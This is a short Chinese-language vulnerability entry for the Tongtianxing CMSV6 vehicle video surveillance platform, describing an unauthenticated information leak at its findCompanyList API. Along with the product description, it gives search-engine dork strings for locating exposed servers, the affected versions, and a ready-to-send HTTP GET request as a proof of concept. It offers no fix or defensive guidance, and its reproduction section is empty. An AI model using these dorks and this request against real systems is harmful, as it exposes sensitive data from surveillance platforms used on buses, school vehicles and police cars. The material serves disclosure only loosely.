1 漏洞描述
通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。 通天星CMSV6车载视频监控平台 /StandardApiAction_findCompanyList.action接口处存在信息泄露漏洞,未授权的攻击者可以通过该漏洞获取服务器敏感信息。
2 搜索语法
uake :body:"/808gps/"
钟馗之眼:body:"/808gps/"
3 影响版本
通天星CMSV6车载视频监控平台 版本:<=7.32.0.2
4 漏洞详情
1 通天星CMSV6车载视频监控平台
2 漏洞POC
GET /StandardApiAction_findCompanyList.action HTTP/1.1 Host: { {Hostname}} User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: */* Accept-Encoding: gzip, deflate Connection: close
3 漏洞复现